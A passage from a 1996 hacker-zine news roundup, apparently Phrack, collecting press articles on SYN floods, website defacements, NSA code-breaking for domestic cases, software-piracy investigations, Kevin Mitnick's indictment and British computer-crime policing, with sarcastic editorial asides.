the RTC vs Ward case is fought out to the bitter end.  Which I
modestly predict will be a devastating, humiliating defeat for
them from a pauper pro per.

I have given them a final settlement offer that they can leave or
take. Actually they have a window of opportunity now to drop the
suit since my counterclaims have been dismissed (although Judge
Whyte invited me to re-file a new counterclaim motion on more
legally sufficiant basis).

I think Keith and I have found a successful counter-strategy to
the cult's system of litigation harassment.

Meanwhile, I could use some help from veteran a.r.s'ers. I need
any copy you have of the Cease and Desist letter that you may
have received last year from Eliot Abelson quondam criminal cult
attorney and Eugene Martin Ingram spokespiece.


Physical mail:

Grady Ward
3449 Martha Ct.
Arcata, CA  95521-4884

JP's BMPs or fax-images to:

grady@northcoast.com

Thanks.

Grady Ward

Ps. I really do need all of your help and good wishes after all.
Thanks for all of you keeping the net a safe place to insult
kook kults.

[=-------------------------------------------------------------------------=]

title: Hackers Bombard Internet
author: Dinah Zeiger
source: Denver Post

9/21/96

        Computer hackers have figured out a new way to tie the Internet
in knots - flooding network computers with messages so other users can't
access them.
        Late Thursday, the federally funded Computer Emergency Response
Team at Carnegie-Mellon University in Pittsburgh issued an advisory to
Internet service providers, universities and governments detailing the
nature of the attacks, which have spread to about 15 Internet services
over the past six weeks. Three were reported this week.
        Thus far, none of the Colorado-based Internet providers contacted
has been victimized, but all are on alert and preparing defenses.
        The worst of it is that there is no rock-solid defense, because
the attacks are launched using the same rules - or protocols- that allow
Internet computers to establish a connection.
        The best the Computer Emergency Response Team can do so far is to
suggest modifications that can reduce the likelihood that a site will be
targeted.
        In essence, hackers bombard their victim sites with hundreds of
messages from randomly generated, fictitious addresses. The targeted
computers overload when they try to establish a connection with the false
sites. It doesn't damage the network, it just paralyzes it.
        The Computer Emergency Response Team traces the attacks to two
underground magazines, 2600 and Phrack, which recently published the code
required to mount the assaults.

[* Uh, wait.. above it said messages.. which sounds more like usenet,
   not SYN Floods.. *]

        "It's just mischief," said Ted Pinkowitz, president of Denver
based e-central. "They're just doing it to prove that it can be done."
        One local Internet service provider, who declined to be identified
because he fears being targeted, said it goes beyond pranks.
        "It's malicious," he said. "They're attacking the protocols that
are the most basic glue of the Internet and it will take some subtle work
to fix it. You can't just redesign the thing, because it's basic to the
operation of the entire network."
        The response team says tracking the source of an attack is
difficult, but not impossible.
        "We have received reports of attack origins being identified,"
the advisory says.

[=-------------------------------------------------------------------------=]

title: Crypto Mission Creep
author: Brock N. Meeks

The Justice Department has, for the first time, publicly acknowledged
using the code-breaking technologies of the National Security Agency, to
help with domestic cases, a situation that strains legal boundaries of
the agency.

Deputy Attorney General Jamie Gorelick admitted in July, during an open
hearing of the Senate's Governmental Affairs permanent subcommittee on
investigations, that the Justice Department:  "Where, for example, we
are having trouble decrypting information in a computer, and the
expertise lies at the NSA, we have asked for technical assistance under
our control."

That revelation should have been a bombshell.  But like an Olympic
diver, the revelation made hardly a ripple.

By law the NSA is allowed to spy on foreign communications without
warrant or congressional oversight.  Indeed, it is one of the most
secretive agencies of the U.S. government, whose existence wasn't even
publicly acknowledged until the mid-1960s.   However, it is forbidden to
get involved in domestic affairs.

During the hearing Sen. Sam Nunn (D-Ga.) asked Gorelick if the President
had the "the constitutional authority to override statutes where the
basic security of the country is at stake?"  He then laid out a
scenario:  "Let's say a whole part of the country is, in effect,
freezing to death in the middle of the winter [because a power grid has
been destroyed] and you believe it's domestic source, but you can't
trace it, because the FBI doesn't have the capability.  What do you do?"

Gorelick replied that:  "Well, one thing you could do -- let me say
this, one thing you could do is you could detail resources from the
intelligence community to the law enforcement community.  That is, if
it's under -- if it's -- if you're talking about a technological
capability, we have done that."   And then she mentioned that the NSA
had been called on to help crack some encrypted data.

But no one caught the significance of Gorelick's' statements.  Instead,
the press focused on another proposal she outlined, the creation of what
amounts to a "Manhattan Project" to help thwart the threat of
information warfare.  "What we need, then, is the equivalent of the
'Manhattan Project' for infrastructure protection, a cooperative venture
between the government and private sector to put our best minds together
to come up with workable solutions to one of our most difficult
challenges,'' Gorelick told Congress.  Just a day earlier, President
Clinton had signed an executive order creating a blue-ribbon panel, made
up of several agencies, including the Justice Department, the CIA, the
Pentagon and the NSA and representatives of the private sector.

Though the press missed the news that day; the intelligence agency
shivered.  When I began investigating Gorelick's statement, all I got
were muffled grumbling.   I called an NSA official at home for comments.
"Oh shit," he said, and then silence.   "Can you elaborate a bit on that
statement?" I asked, trying to stifle a chuckle.  "I think my comment
says it all," he said and abruptly hung up the phone.

Plumbing several sources within the FBI drew little more insight.   One
source did acknowledge that the Bureau had used the NSA to crack some
encrypted data "in a handful of instances," but he declined to
elaborate.

Was the Justice Department acting illegally by pulling the NSA into
domestic work?   Gorelick was asked by Sen. Nunn if the FBI had the
legal authority to call on the NSA to do code-breaking work.   "We have
authority right now to ask for assistance where we think that there
might be a threat to the national security," she replied.  But her
answer was "soft."   She continued:  "If we know for certain that there
is a -- that this is a non-national security criminal threat, the
authority is much more questionable."  Questionable, yes, but averted?
No.

If Gorelick's answers seem coy, maybe it's because her public statements
are at odds with one another.   A month or so before her congressional
bombshell, she revealed the plans for the information age"Manhattan
Project" in a speech.   In a story for Upside magazine, by
old-line investigative reporter Lew Koch, where he broke the story,
Gorelick whines in her speech about law enforcement going through "all
that effort" to obtain warrants to search for evidence only to find a
child pornography had computer files "encrypted with DES" that don't
have a key held in escrow.  "Dead end for us," Gorelick says.  "Is this
really the type of constraint we want? Unfortunately, this is not an
imaginary scenario. The problem is real."

All the while, Gorelick knew, as she would later admit to Congress, that
the FBI had, in fact, called the NSA to help break codes.

An intelligence industry insider said the NSA involvement is legal.
"What makes it legal probably is that when [the NSA] does that work
they're really subject to all the constraints that law enforcement is
subject to."    This source went on to explain that if the FBI used any
evidence obtained from the NSA's code-breaking work to make it's case in
court, the defense attorney could, under oath, ask the NSA to "explain
fully" how it managed to crack the codes.  "If I were advising NSA today
I would say, there is a substantial risk that [a defense attorney] is
going to make [the NSA] describe their methods," he said.  "Which means
it's very difficult for the NSA to do its best stuff in criminal cases
because of that risk."

Some 20 years ago, Sen. Frank Church, then chairman of the Senate
Intelligence Committee, warned of getting the NSA involved in domestic
affairs, after investigating the agency for illegal acts.  He said the
"potential to violate the privacy of Americans is unmatched by any other
intelligence agency."   If the resources of the NSA were ever used
domestically, "no American would have any privacy left . . . There would
be no place to hide," he said.  "We must see to it that this agency and
all agencies that possess this technology operate within the law and
under proper supervision, so that we never cross over that abyss.  That
is an abyss from which there is no return," he said.

And yet, the Clinton Administration has already laid the groundwork for
such "mission creep" to take place, with the forming of this "Manhattan
Project."

But if the Justice Department can tap the NSA at will -- a position of
questionable legality that hasn't been fully aired in public debate --
why play such hardball on the key escrow encryption issue?

Simple answer:  Key escrow is an easier route.  As my intelligence
community source pointed out, bringing the NSA into the mix causes
problems when a case goes to court.   Better to have them work in the
background, unseen and without oversight, the Administration feels. With
key escrow in place, there are few legal issues to hurdle.

In the meantime, the Justice Department has started the NSA down the
road to crypto mission creep.  It could be a road of no return.

Meeks out...

[=-------------------------------------------------------------------------=]

title: Hacker posts nudes on court's Web pages
author: Rob Chepak
source: The Tampa Tribune


       TALLAHASSEE - The Internet home of the Florida Supreme Court isn't
the kind of place you'd expect to find nudity.
       But that's what happened Wednesday morning when a judge in
Tallahassee found a pornographic photo while he was looking for the latest
legal news.
       A computer hacker broke into the high court's cyberhome, placing at
least three pornographic photos and a stream of obscenities on its Web pages.
       ``All I looked at was the one picture, then I checked with the
court,'' said a surprised Charles Kahn Jr., a 1st District Court of Appeal
judge.
       The altered pages were immediately turned off. The Florida Department
of Law Enforcement is investigating the incident and the U.S. Justice
Department has been contacted. The hacker didn't tamper with any official
records, court officials said.
       ``We've got three photos and we're looking for more,'' said Craig
Waters, executive assistant to Chief Justice Gerald Kogan. The culprit
``could be anyone from someone in the building to the other side of
the world.''

[* I bet they are looking for more.. *]

       The Florida Court's Web site is used to post information about court
opinions, state law and legal aid. Thousands of people, including children,
use the court system's more than 500 Internet pages each month, Waters said.
       The court and other state agencies usually keep their most vital
information on separate computers that can't be accessed on the Internet.
       Officials aren't sure how the culprit broke in, and FDLE had no
suspects Thursday afternoon. But court officials long have suspected their
Web site could be a target for hackers armed with the computer equipment to
impose photos on the Web. The Florida Supreme Court became the first state
Supreme Court in the nation to create its own Internet pages two years ago.
       While the episode sounds like a well-crafted high school prank,
computer hackers are becoming a big problem for government agencies, which
increasingly are finding themselves the victims of criminal tampering on
the Internet. In August, someone placed swastikas and topless pictures of
a TV star on the U.S.
       Department of Justice's home page. The Central Intelligence Agency
has been victimized, too.
       ``It's certainly a common problem,'' said P.J. Ponder, a lawyer for
the Information Resource Commission, which coordinates the state
government's computer networks. However, there are no statistics on
incidences of tampering with state computers.
       The best way for anyone to minimize damage by computer hackers is by
leaving vital information off the Internet, said Douglas Smith, a consultant
for the resource commission. Most state agencies follow that advice, he added.
       ``I think you have to weigh the value of security vs. the value of
the information you keep there,'' he said.
       Court officials would not reveal details of the sexually explicit
photos Thursday, but Liz Hirst, an FDLE spokeswoman, said none were of
children.
       Penalties for computer tampering include a $5,000 fine and five
years in jail, but the punishment is much higher if it involves child
pornography, she said.
       Without a clear motive or obvious physical evidence, FDLE
investigators, who also investigate child pornography on the Internet,
hope to retrace the culprit's steps in cyberspace. However, Ponder said
cases of Internet tampering are ``very difficult to solve.''
       Thursday, the state's top legal minds, who are used to handing out
justice, seemed unaccustomed to being cast as victims.
       ``No damage was done,'' Kogan said in a statement. ``But this
episode did send a message that there was a flaw in our security that we
now are fixing.''

[* I tell you (and other agencies) I do security consulting!! Please?! *]

[=-------------------------------------------------------------------------=]

title: Hacking Into Piracy
source: The Telegraph

22nd October 1996

Computer crime investigators are using the techniques of their
adversaries to crack down on illegally traded software. Michael
McCormack reports.

The adage "Set a thief to catch a thief" is being updated for the
electronic age as online investigators use hackers' techniques to fight
a thriving trade in counterfeit and pirate software that is reckoned to
cost British program-makers more than 3 billion a year.

"Jason", a computer crime investigator employed by Novell to shut down
bulletin boards that trade pirate copies of its software, leads a
confusing double life. First he spends weeks in his office, surfing the
Internet and wheedling secrets from hackers around Europe; then he
compiles dossiers of evidence on the system operators who deal in Novell
wares, flies to their bases, presents the local police with his reports,
and accompanies them on the inevitable raid.

"Every day I'm on IRC [the Internet's chat lines, where information can
be exchanged quickly and relatively anonymously] looking for tips on new
bulletin boards that might have Novell products on them," he says.

"Our policy has been to go country by country through Europe and try to
take down the biggest boards in each one"

"It tends to be the biggest boards that have our products, and those can
be difficult to get on to. The operators have invested a lot of time and
cash in setting them up and they're sometimes quite careful who they'll
let on. I often start by joining dozens of little boards in the area to
get myself a good reputation, which I can use as a reference to get on
to the big board.

"Our policy has been to go country by country through Europe and try to
take down the biggest boards in each one. That has a chilling effect on
the other operators. They think, 'If he could get caught, I'm doomed.'
Within days of us taking down a big board, Novell products disappear off
the smaller ones."

Once Jason gains entry to a big board, the game begins in earnest:
"Bulletin boards work on the principle that if you want to take
something off, you first have to put something in. Obviously I can't put
in Novell's products, or any other company's; instead, we use a program
we wrote ourselves. It's huge, and it has an impressive front end full
of colour screen indicators and menus. It doesn't actually do anything
but it looks impressive and it lets you start pulling things off the
site."

Once Jason finds company products on a board, he makes a video of
himself logging on and retrieving a copy of the software.

[* Talk about freako bizarre narc fetishes.. *]

Bulletin boards often have restricted areas closed to all but a few
trusted members, and these are where the most illegal products - such as
expensive business or word-processing packages copied from beta releases
or pirate disks - are kept. Penetrating these areas takes a skill
learned from the hackers. "It's called social engineering," says Jason.
"It just means chatting up the operator until he decides to trust you
with the goodies."

Once Jason finds company products on a board, he makes a video of
himself logging on and retrieving a copy of the software. Then it's on
to a plane to go and lodge a complaint with the local police.

He is helped by Simon Swale, a fellow Novell investigator and former
Metropolitan Police detective who uses his experience of international
police procedures and culture to ensure that foreign forces get all the
technical help they need.

In the past six months, Jason's investigations have shut down seven
bulletin boards across Europe, recovering software valued at more than
500,000. The company reckons the closed boards would have cost it more
than 2.5 million in lost sales over the next year.

Jason has vivid memories of the early-morning raid on the operator's
house.

One of the Jason's biggest successes came earlier this year in Antwerp,
when he guided Belgian police to the Genesis bulletin board, which held
more than 45,000 worth of Novell products and a slew of other pirate
software. Jason has vivid memories of the early-morning raid on the
operator's house: "The first thing he said was, 'I have nothing illegal
on my system.' So I set up my laptop and mobile and dialled into it from
his kitchen. All the police watched as I tapped into my keyboard and
everything popped up on his screen across the room. I went straight
in to the Novell stuff and he said, 'Okay, maybe I have a little'."

The system operator, Jean-Louis Piret, reached a six-figure out-of-court
settlement with Novell. More importantly for the company, its products
have all but disappeared from Belgium's boards in the wake of the raid.

There are, however, many more fish to fry. Jason already has another
three raids lined up for autumn . . .

[=-------------------------------------------------------------------------=]

title: Revealing Intel's Secrets

The Intel's Secrets site may not be around for long if Intel has anything
to say about it. The site provides a look at details, flaws, and programming
tips that the giant chip manufacturer would rather not share with the general
public. One particular page exposes some unflattering clitches of the P6
chip and a bug in the Intel486 chip. The site even has two separate hit
counters: one for the average visitor, and one that counts the number of
times Intel has stopped by.  

[=-------------------------------------------------------------------------=]

title: Internet Boom Puts Home PCs At Risk Of Hackers
author: Nick Nuttall
source: The London Times

18th October 1996

Home computers, which carry everything from private banking details to
love letters, are becoming vulnerable to hackers as more households
connect to the Internet. 

The boom in electronic services is making the home PC as open to attack
as company and government systems, a survey of hackers has disclosed.
The Internet is also helping hackers to become more skilful as they
exchange tips and computer programs around the globe. 

[* Survey of hackers?! Bullshit. *]

A spokesman for Kinross and Render, which carried out the survey for
Computacenter, said: "Breaking into home computers is now increasingly
possible and of great interest to hackers. It may be a famous person's
computer, like Tony Blair's or a sports personality. Equally it could be
yours or my computer carrying personal details which they could use for
blackmailing." 

Passwords remain easy to break despite warnings about intrusion.
Companies and individuals frequently use simple name passwords such as
Hill for Damon Hill or Blair for the Labour leader. Hackers also said
that many users had failed to replace the manufacturer's password with
their own. 

Hackers often use programs, downloaded from the Internet, which will
automatically generate thousands of likely passwords. These are called
Crackers and have names such as Satan or Death.

[* Satan? Death? Ahhhh! *]

John Perkins, of the National Computing Centre in Manchester, said
yesterday: "The linking of company and now home computers to the
global networks is making an expanding market for the hackers." The
Computacenter survey was based on interviews with more than 130
hackers, supplemented by interviews over the Internet. The average
hacker is 23, male and a university student. At least one of those
questioned began hacking ten years ago, when he was eight. 

[* No offense to anyone out there, but how in the hell could they
   validate any claims in a survey like that? And especially with
   that amount? *]

Most said it was getting easier, rather than harder, to break in and
many hackers would relish tighter computer security because this would
increase the challenge. Existing laws are held in contempt and almost 80
per cent said tougher laws and more prosecutions would not be a
deterrent. Eighty-five per cent of those questioned had never been
caught.

Most said the attraction of hacking lay in the challenge, but a hard
core were keen to sabotage computer files and cause chaos, while others
hoped to commit fraud.

[* Excuse me while I vomit. *]

[=-------------------------------------------------------------------------=]

title: Computer hacker Mitnick pleads innocent

September 30, 1996

LOS ANGELES (AP) -- The notorious computer hacker Kevin Mitnick pleaded
innocent Monday to charges he mounted a multimillion-dollar crime wave
in cyberspace during 2 1/2 years as a fugitive.

Mitnick, 33, held without bail on a fraud conviction, told the judge
not to bother reading the indictment, which includes 25 new counts of
computer and wire fraud, possessing unlawful access devices, damaging
computers and intercepting electronic messages.

"Not guilty," Mitnick said.  His indictment, handed up Friday by a
federal grand jury, follows an investigation by a national task force
of FBI, NASA and federal prosecutors with high-tech expertise.

It charges Mitnick with using stolen computer passwords, damaging
University of Southern California computers and stealing software
valued at millions of dollars from technology companies, including
Novell, Motorola, Nokia, Fujitsu and NEC.

                           ...........

Mitnick pleaded guilty in April to a North Carolina fraud charge of
using 15 stolen phone numbers to dial into computer databases.
Prosecutors then dropped 22 other fraud charges but warned that new
charges could follow.

Mitnick also admitted violating probation for a 1988 conviction in Los
Angeles where he served a year in jail for breaking into computers at
Digital Equipment Corp. At 16, he served six months in a youth center
for stealing computer manuals from a Pacific Bell switching center.

Mitnick also got a new lawyer Monday, Donald C. Randolph, who
represented Charles Keating Jr.'s top aide, Judy J. Wischer, in the
Lincoln Savings swindle.

[=-------------------------------------------------------------------------=]

title: Hackers Destroy Evidence of Gulf War Chemical/Biological Weapons
source: WesNet News

Saturday, Nov. 2, 5:00 p.m.

WASHINGTON DC -- Hackers broke into a Web site (http://insigniausa.com)
containing suppressed evidence of Gulf War chemical and biological weapons
Friday, erasing all files.

"Someone hacked in Friday around 4 p.m. and completely trashed our
machine," said Kenneth Weaver, webmaster of W3 Concepts, Inc.
(http://ns.w3concepts.com) of Poolesville, Maryland (a suburb of Washington
D.C.), which houses the site. 

The Web site contained recently-released supressed Department of Defense
documents exposing biological and chemical warfare materials that U.S.
companies allegedly provided to Iraq before the war. 

Bruce Klett, publisher, Insignia Publishing said they are now restoring the
files. "We plan to be operational again Saturday evening or Sunday," he
said. "We encourage anyone to copy these files and distribute them." There
are over 300 files, requiring 50 MB of disk space.

The Department of Defense has its own version of these files on its
Gulflink Web site (http://www.dtic.dla.mil/gulflink/).

Insignia plans to publish Gassed In the Gulf, a book on the government's
coverup by former CIA analyst Patrick Eddington, in six to eight weeks,
Klett added.

Hackers also brought down SNETNEWS and IUFO, Internet mailing lists
covering conspiracies and UFOs, on Oct. 25, according to list administrator
Steve Wingate. He plans to move the lists to another Internet service
provider be be back in operation soon.

"We've seen this happen regularly when we get too close to sensitive
subjects," Wingate said. "The election is Tuesday. This is a factor."

He also said a "quiet" helicopter buzzed and illuminated his Marin County
house and car Thursday night for several minutes.

[=-------------------------------------------------------------------------=]

title: Criminals Slip Through The Net
source: The Telegraph, London

5th November 1996

Britain is way behind in the fight against computer crime and it's time
to take it seriously, reports Michael McCormack


BRITAIN'S police forces are lagging behind the rest of the world in
combating computer crime, according to one of the country's most
experienced computer investigators - who has just returned to walking
the beat.

Police Constable John Thackray, of the South Yorkshire Police, reached
this grim conclusion after a three-month tour of the world's leading
computer crime units, sponsored by the Winston Churchill Memorial Trust.

All of the five countries he studied, he says, are putting Britain's
efforts against electronic crime to shame.

"The level of education and understanding of computer crime is far more
advanced outside Britain," said Thackray.

"Here, police forces are shying away from even attempting to investigate
computer crimes. You see experienced detectives who lose all interest in
pursuing cases where there are computers involved.

"We know that computer crime, particularly software piracy, is closely
connected with organised crime - they like the high profits and the low
risk - but those connections aren't followed up."

He adds:"We are far behind our own criminals on these matters. We only
catch them when they get complacent and keep using old technology and
old methods. If they simply keep up with current technology, they are so
far ahead they are safe." Thackray was one of the officers responsible
for closing down one of the largest pirate bulletin boards in the
country, estimated to have stolen software worth thousands last year and
has assisted officers from other forces in several similar cases.
Pirates recently named a new offering of bootleg software "Thackray1 and
2" in his honour.

He has seen how seriously such crimes are taken by police forces abroad:
"In America there are specialist units in every state and a similar
system is being put in place in Australia. There's nothing nearly as
comprehensive in in Britain.

"We have the Computer Crimes Unit at Scotland Yard and a small forensic
team at Greater Manchester, but they're both badly under-resourced and
there's little interest in, or support for, investigating computer
crimes in other forces.

"Our officers must get a better education, to start with, on what
computer crime is, how it works and who is being hurt by it. We need to
bury the impression that this is a victimless crime with no serious
consequences."

Thackray is preparing a report on his impressions of anti-crime
initiatives in other countries and what must be done in Britain to equal
them. "In my view, we need specially detailed officers who are educated
in computer crime issues.

"We also need to become much more pro-active in our approach. It's not
good enough to sit back and wait for the complaints."

But perhaps symptomatic of Britain's efforts is the way Thackray's
valuable experience is being used. He is putting away his laptop and
getting out his boots.

"I'm now being moved back into uniform. The two year experience I have
gained in investigating these matters is not going to be used to its
full potential."

"We pride ourselves on being an effective police service in Britain, and
other countries look up to us. But when it comes to computer crime, we
have to start following their lead."

-EOF


--------------------------------------------------------------------------------